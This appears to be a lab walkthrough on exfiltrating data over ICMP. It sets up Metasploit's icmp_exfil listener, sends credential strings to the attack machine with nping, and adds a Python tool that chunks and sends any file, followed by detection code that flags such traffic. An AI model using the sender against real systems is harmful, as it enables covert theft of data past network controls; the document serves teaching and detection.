Data exfiltration over ICMP

Using Metasploit auxiliary/server/icmp_exfil:

# msfconsole
msf6 > use auxiliary/server/icmp_exfil
msf6 auxiliary(server/icmp_exfil) > options

Module options (auxiliary/server/icmp_exfil):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   BPF_FILTER       icmp             yes       BPF format filter to listen for
   END_TRIGGER      ^EOF             yes       Trigger for end of file
   FNAME_IN_PACKET  true             yes       Filename presented in first packet straight after START_TRIGGER
   INTERFACE                         no        The name of the interface
   RESP_CONT        OK               yes       Data to respond when continuation of data expected
   RESP_END         COMPLETE         yes       Data to respond when EOF received and data saved
   RESP_START       SEND             yes       Data to respond when initial trigger matches
   START_TRIGGER    ^BOF             yes       Trigger for beginning of file

Set options. The BPF filter excludes the attack machine's own address so the listener does not capture its own echo replies, and INTERFACE must be the interface the target reaches you on (tun0 over the lab VPN):

msf6 auxiliary(server/icmp_exfil) > set BPF_FILTER icmp and not src <IP attack machine>
BPF_FILTER => icmp and not src <IP attack machine>
msf6 auxiliary(server/icmp_exfil) > set INTERFACE tun0
INTERFACE => tun0

Start the listener before the target sends anything. It answers each matching packet in its echo reply payload with RESP_START, RESP_CONT or RESP_END (SEND, OK, COMPLETE). Check that the interface named in the start-up line is the one you set; if it is not, the packets are never seen:

msf6 auxiliary(server/icmp_exfil) > run

[*] ICMP Listener started on eth0 (ATTACKBOX_IP). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)

In another terminal, log in to the icmp box and start the transmission. The first packet carries START_TRIGGER immediately followed by the filename (FNAME_IN_PACKET is true), so "BOFfile.txt" names the loot file. nping needs root for raw ICMP, hence sudo:

thm@jump-box$ ssh thm@icmp.thm.com
thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "BOFfile.txt"

Send the data, one echo request per chunk:

thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "admin:password"

thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "admin2:password2"

End the transmission with END_TRIGGER; the listener then writes the file to loot:

thm@icmp-host:~# sudo nping --icmp -c 1 <IP attack machine> --data-string "EOF"

Results (listener output; 14 + 16 = 30 bytes, the two payloads concatenated as received with no separator):

[+] Beginning capture of "file.txt" data
[*] 30 bytes of data received in total
[+] End of File received. Saving "file.txt" to loot
[+] Incoming file "file.txt" saved to loot
[+] Loot filename: /path/to/loot/filename.txt
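The exchange above, both sides, as an added example (not code from the page or from Metasploit). It frames an arbitrary file into the BOF+filename / chunks / EOF sequence the module expects, builds the equivalent nping command lines (with --data <hex> instead of --data-string so binary chunks survive), and models the listener's state machine so the whole transfer can be checked offline. The trigger strings and reply words are the module defaults shown in options; MAX_CHUNK, the function names and the Receiver model are this example's own assumptions.

```python
"""ICMP exfil framing and receiver model.

Added example, not code from the page or from Metasploit. The trigger strings
and reply words are the module defaults shown in `options` above; chunk size,
function names and the receiver model are this example's own assumptions.
"""
from __future__ import annotations

import subprocess
from dataclasses import dataclass, field

START_TRIGGER = b"BOF"        # START_TRIGGER default (^BOF, anchored at payload start)
END_TRIGGER = b"EOF"          # END_TRIGGER default (^EOF)
RESP_START, RESP_CONT, RESP_END = b"SEND", b"OK", b"COMPLETE"
MAX_CHUNK = 1024              # assumption: stay well under an unfragmented echo payload


def frame_file(filename: str, data: bytes, chunk: int = MAX_CHUNK) -> list[bytes]:
    """Payloads the client must send, in order: trigger+filename, data chunks, EOF."""
    if chunk <= 0:
        raise ValueError("chunk must be positive")
    payloads = [START_TRIGGER + filename.encode()]
    payloads += [data[i:i + chunk] for i in range(0, len(data), chunk)]
    payloads.append(END_TRIGGER)
    return payloads


def nping_commands(target: str, payloads: list[bytes]) -> list[list[str]]:
    """One `nping --icmp -c 1` per payload, as typed on this page, but with
    --data <hex> instead of --data-string so binary chunks are sent intact.
    Built here, not executed; needs root (raw sockets) when run."""
    return [["nping", "--icmp", "-c", "1", target, "--data", "0x" + p.hex()] for p in payloads]


def send_with_nping(target: str, filename: str, data: bytes) -> None:
    """Actually run the commands (requires nping on PATH and root)."""
    for cmd in nping_commands(target, frame_file(filename, data)):
        subprocess.run(cmd, check=True)


@dataclass
class Receiver:
    """Listener side as the module's options describe it: wait for the start
    trigger, take the filename from the same packet (FNAME_IN_PACKET=true),
    append every following payload until the end trigger, and answer each
    packet with the matching RESP_* word (carried in the echo reply payload)."""
    filename: str | None = None
    buf: bytearray = field(default_factory=bytearray)
    loot: dict[str, bytes] = field(default_factory=dict)

    def handle(self, payload: bytes) -> bytes | None:
        if self.filename is None:
            if not payload.startswith(START_TRIGGER):
                return None                      # unrelated ICMP, ignored
            self.filename = payload[len(START_TRIGGER):].decode(errors="replace") or "unnamed"
            self.buf = bytearray()
            return RESP_START
        # The module matches ^EOF as a regex, so a binary chunk that happens to
        # begin with "EOF" would truncate the file: a real limitation of the scheme.
        if payload.startswith(END_TRIGGER):
            self.loot[self.filename] = bytes(self.buf)
            self.filename = None
            return RESP_END
        self.buf += payload
        return RESP_CONT


def simulate(filename: str, data: bytes, chunk: int = MAX_CHUNK) -> tuple[list[bytes], dict[str, bytes]]:
    """Run both sides offline: returns the listener's replies and its loot."""
    rx = Receiver()
    replies = [rx.handle(p) for p in frame_file(filename, data, chunk)]
    return replies, rx.loot


if __name__ == "__main__":
    # Constructed sample matching the page: 30 bytes in two chunks.
    replies, loot = simulate("file.txt", b"admin:password" + b"admin2:password2", chunk=16)
    print(replies, len(loot["file.txt"]), "bytes")
```

The chunking and the command builder are the generalisation of the three hand-typed nping lines: the same sequence works for any file, and the Receiver shows why the scheme has no integrity or ordering protection (a lost or reordered echo request silently corrupts the loot).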

Counter moves

Echo requests with unusual payload length or volume are the tell: a stock ping carries 56 data bytes on Linux and 32 on Windows with a fixed filler pattern, so payloads of other sizes, or payloads that are readable text, stand out, as does a steady stream of single echo requests from one internal host to one external address. Egress filtering of ICMP at the perimeter (or permitting echo only towards known monitoring hosts) and a simple size and rate baseline close it. Note that the transfer above moved 30 bytes in four small packets, so content and rate, not size alone, are what catch small secrets. The defender's view is in the blue notes on watching the exits.
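The three checks just described (payload size against the stock ping baseline, readable text in the payload, and per-source rate), run over constructed sample echo requests that include the four-packet transfer from this page. This is an added example, not detection logic from the page or from any product; the baselines, thresholds, packet records and function names are this example's own assumptions.

```python
"""Detection for the ICMP channel above, run over constructed sample packets.

Added example; thresholds, baselines and the packet records are this
example's own assumptions, not anything the page or Metasploit provides.
"""
from collections import defaultdict

# Stock echo requests: Linux ping carries 56 data bytes (8-byte timestamp then
# 0x10, 0x11, ...), Windows ping carries 32 bytes of "abcdefgh...". Anything
# else in an echo request payload is worth a look.
LINUX_FILL = bytes(range(0x10, 0x10 + 48))
WINDOWS_FILL = b"abcdefghijklmnopqrstuvwabcdefghi"
NORMAL_SIZES = {56, 32}
RATE_WINDOW = 10.0   # seconds (assumed baseline, tune to the network)
RATE_LIMIT = 5       # echo requests per source per window before flagging


def looks_like_stock_ping(payload: bytes) -> bool:
    """True only for the exact Linux or Windows default ping payload."""
    if len(payload) == 56:
        return payload[8:] == LINUX_FILL
    if len(payload) == 32:
        return payload == WINDOWS_FILL
    return False


def printable_ratio(payload: bytes) -> float:
    return sum(32 <= b < 127 for b in payload) / len(payload) if payload else 0.0


def analyse(packets):
    """packets: iterable of (timestamp, src_ip, echo_request_payload).
    Returns a list of (timestamp, src_ip, reason) alerts."""
    alerts = []
    recent = defaultdict(list)
    for ts, src, payload in packets:
        reasons = []
        if len(payload) not in NORMAL_SIZES:
            reasons.append(f"unusual payload length {len(payload)}")
        if not looks_like_stock_ping(payload) and printable_ratio(payload) > 0.9:
            reasons.append("readable text in payload")
        # Sliding window of this source's recent echo requests.
        window = recent[src] = [t for t in recent[src] if ts - t <= RATE_WINDOW] + [ts]
        if len(window) > RATE_LIMIT:
            reasons.append(f"{len(window)} echo requests in {RATE_WINDOW:.0f}s")
        alerts.extend((ts, src, r) for r in reasons)
    return alerts


def sample_packets():
    """Constructed traffic: one normal Linux ping, the four-packet transfer from
    this page, and a host sending stock Windows pings too frequently."""
    pkts = [(0.0, "10.0.0.5", b"\x00" * 8 + LINUX_FILL)]
    pkts += [(1.0 + 0.5 * i, "10.0.0.7", p) for i, p in enumerate(
        [b"BOFfile.txt", b"admin:password", b"admin2:password2", b"EOF"])]
    pkts += [(20.0 + 0.5 * i, "10.0.0.9", WINDOWS_FILL) for i in range(6)]
    return sorted(pkts)


if __name__ == "__main__":
    for ts, src, reason in analyse(sample_packets()):
        print(f"{ts:6.1f} {src:10} {reason}")
```

Every packet of the transfer trips both the size and the text check, while the normal Linux ping trips nothing and the chatty Windows host is caught by rate alone; the size check is the cheapest to deploy, but an attacker who pads each chunk to 56 bytes defeats it, which is why the content and rate checks are kept alongside it.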